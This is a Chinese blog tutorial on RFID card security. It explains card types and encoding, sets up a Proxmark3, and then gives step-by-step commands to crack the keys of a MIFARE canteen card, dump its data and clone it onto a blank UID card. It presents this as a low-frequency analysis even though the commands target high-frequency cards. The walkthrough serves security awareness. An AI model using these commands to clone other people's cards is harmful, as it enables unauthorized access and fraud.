RFID 低頻卡安全分析

流曲頻陽 2018-08-03

展開全文

低頻非接觸卡主要用于門禁丶考勤等等在日常生活中使用非常的廣泛，但他也具有比較大的安全隱患，他沒有一些密鑰安全認(rèn)證這類安全機制，所有我們只要對低頻卡有所研究就可以對這些卡進行破解和復(fù)制。

基礎(chǔ)介紹

RFID: 射頻識別技術(shù)，它主要是通過無線電訊號識別特定目標(biāo)，并可讀寫數(shù)據(jù)(單向的讀取)。

RFID 系統(tǒng)的頻率分低頻、高頻、超高頻和微波幾種，其各自的工作頻率如下：

低頻（LF） 125~134kHz；
高頻（HF） 13.56MHz；
超高頻（UHF） 860~960MHz；
微波（MW） 2.45GHz和5.8GHz。

RFID 無源卡按載波頻率分為：低頻、中頻和高頻射頻卡。

低頻射頻卡：頻率主要包括 125kHz 和 134kHz 兩種，主要用于短距離、低成本的應(yīng)用中，如多數(shù)的門禁控制、校園卡、貨物跟蹤等。

中頻射頻卡：頻率主要為 13.56MHz，主要用于門禁控制和需傳送大量數(shù)據(jù)的應(yīng)用系統(tǒng)。

高頻射頻卡：頻率主要包括 433MHz、915MHz、2.45GHz、5.8GHz 等，可應(yīng)用于需要較長的讀寫距離和高讀寫速度的場合，在火車監(jiān)控、高速公路收費等系統(tǒng)中有廣泛應(yīng)用。

IC 和 ID 的區(qū)別

IC 卡是將微電子芯片嵌入卡基中構(gòu)成的，它是一種具有信息儲存、修改、管理、加密功能的卡。常用于身份認(rèn)證、銀行系統(tǒng)、公共交通、校園一卡通等領(lǐng)域。

ID 卡是一種不可寫入的感應(yīng)卡，擁有固定的編號。

ID 卡的編號是制造時就由芯片廠寫入的，卡號是公開的，無加密功能。常用于門禁卡和停車場身份識別系統(tǒng)。

1 ：低頻卡簡介

低頻卡是指頻段在 30kHz 到 300kHz 的無線電波，一般的卡的頻率在 125/134kHz，主要原因是在這個頻率下不存在任何功能性，也就是說不會存在 ID 識別丶讀取和寫入等。他具有操作簡單丶快捷丶可靠丶壽命長丶不怕卡面污染等優(yōu)點，一般常見的低頻卡有：HID 丶T55xx 丶 EM410x 等這些型號的低頻卡。

2：低頻 ID 卡的編碼原理

125kHzID 卡通常都是使用徹斯特編碼（Manchester Encoding），也叫做相位編碼 (PE)，是一個同步時鐘編碼技術(shù)，被物理層使用來編碼一個同步位流的時鐘和數(shù)據(jù)。曼徹斯特編碼被用在以太網(wǎng)媒介系統(tǒng)中。曼徹斯特編碼提供一個簡單的方式給編碼簡單的二進制序列而沒有長的周期沒有轉(zhuǎn)換級別，因而防止時鐘同步的丟失，或來自低頻率位移在貧乏補償?shù)哪M鏈接位錯誤。在這個技術(shù)下，實際上的二進制數(shù)據(jù)被傳輸通過這個電纜，不是作為一個序列的邏輯 1 或 0 來發(fā)送的（技術(shù)上叫做反向不歸零制 (NRZ)）。相反地，這些位被轉(zhuǎn)換為一個稍微不同的格式，它通過使用直接的二進制編碼有很多的優(yōu)點。

而 ID 卡的在工作狀態(tài)下，只要射頻電路不斷點，非接觸的 ID 卡就會不斷的循環(huán)發(fā)送 64 位數(shù)據(jù)。

3 ：ID卡號格式

由于廠家的 ID 卡號讀卡器的譯碼格式不一樣，在輸出是讀取的二進制或者十六進制的結(jié)果因該是一樣的結(jié)果也是唯一的。

實驗環(huán)境準(zhǔn)備：

一部已安裝 Chroot Linux 的安卓手機(支持 OTG) （也可以使用樹莓派電腦）

一根 OTG 數(shù)據(jù)線

一根 Micro USB 數(shù)據(jù)線

Proxmark III（pm3）

0x01 更新軟件源并安裝相關(guān)依賴

apt update && apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi

0x02 git clone 源碼

git clone https://github.com/iceman1001/proxmark3.git

這里我已經(jīng)提前下載好了

0x03 開始編譯

cd proxmark3 && make clean && make all

接下來就是等待編譯完成了

如圖所示就已經(jīng)編譯完成了

0x04 燒錄固件

首先把你的 PM3 和手機連接上，lsusb 查看是否已經(jīng)識別

如圖所示已經(jīng)成功識別 PM3 設(shè)備

接下來編譯客戶端并升級 CDC 設(shè)備，先拔掉 PM3

cd client && make

然后按住 PM3 上的按鈕不放，再次將PM3連接至手機，執(zhí)行下列命令

./flasher /dev/ttyACM0 -b ../bootrom/obj/bootrom.elf

如圖所示我們已經(jīng)升級成功，接下來我們燒錄固件。切記燒錄固件時千萬不要斷開連接，否則會導(dǎo)致 PM3 變磚的?。。?！

./flasher /dev/ttyACM0 ../armsrc/obj/fullimage.elf

如圖所示我們的冰人固件已經(jīng)升級成功！

接下來我們用客戶端訪問 PM3 看看

./proxmark3 /dev/ttyACM0

(為了方便起見，可以把 pm3 客戶端復(fù)制進 /usr/bin 目錄，以后直接 pm3 /dev/ttyACM0就行了)

可以看到已經(jīng)成功連接

hw tune

接下來可以測測天線電壓看看(此步驟可以忽略)

目測沒有什么問題，接下來就可以進入實戰(zhàn)篇了

0x05 實戰(zhàn)篇

首先聲明一點，我這里是拿我的飯卡做測試，但是并沒有對飯卡的數(shù)據(jù)進行過任何的修改?。?！任何涉及修改數(shù)據(jù)達到修改余額的目的都是違法的?。。∵@點請你們牢記?。?！

首先我們通過客戶端連接 pm3(一般這里要等 5-10 秒鐘)

pm3 /dev/ttyACM0

然后把飯卡放到 PM3 上

接著我們查看一下卡的基本信息

hf 14a read

可以看到卡的 UID，記下這個 UID，留著備用( UID 是用戶身份證明 (User Identification) 的縮寫)

然后測試卡的默認(rèn)密碼

hf mf darkside

如圖已經(jīng)發(fā)現(xiàn)了這張卡的一個默認(rèn)密碼，接下來可以根據(jù)這個密碼求算出整張卡的所有密碼

hf mf nested 1 0 A 3279026bb994 d

執(zhí)行這條命令將會把這張卡的所有密碼 dump 出來一個 key.bin 文件

接下來就可以 dump 整張卡的數(shù)據(jù)了

hf mf dump

這條命令將會把整張卡的數(shù)據(jù) dump 出為一個 data.bin 文件

如圖所示已經(jīng)成功的將這張卡的數(shù)據(jù) dump 出來了

接下來我們可以將 dump 出來的數(shù)據(jù)恢復(fù)到另一張 UID 卡上

hf mf csetuid 3C6123AB

接下來我們把另外一張 UID 卡放到 PM3 上，首先修改 UID (就是之前記下的那個 UID 碼)

設(shè)置 UID 成功

hf mf restore

接下來就可以把數(shù)據(jù)恢復(fù)到這張卡里了

如圖所示已經(jīng)成功的把數(shù)據(jù)恢復(fù)到新的 UID 卡上了，為了驗證是否成功，我們可以讀取一下扇區(qū)數(shù)據(jù)看看

hf mf rdsc 0 A 3279026bb994

可以看到已成功讀取扇區(qū)數(shù)據(jù)，至此，我們已經(jīng)成功的復(fù)制了一張卡！

總結(jié) :

安全不單單局限與網(wǎng)絡(luò)，為什么在一些重要的地方要物理隔離像人事丶財務(wù)這些都是物理隔離的重點對象，因為黑客不一定只會通過網(wǎng)絡(luò)進行入侵和破壞他們也可以到現(xiàn)場進行入侵，而往往一些門禁系統(tǒng)確實是一些公司的最后一道防線，而門禁系統(tǒng)安全性能卻是一些公司的疏忽的地方。安全是一個大工作需要個個部門的相互配合才能發(fā)揮出最好的防御狀態(tài)。寫出這篇文章希望大家不單單局限與“網(wǎng)絡(luò)安全”，也希望大家能重視身邊的一些安全設(shè)備，因為時代在變，攻擊手法也在變，所謂道高一尺魔高一丈。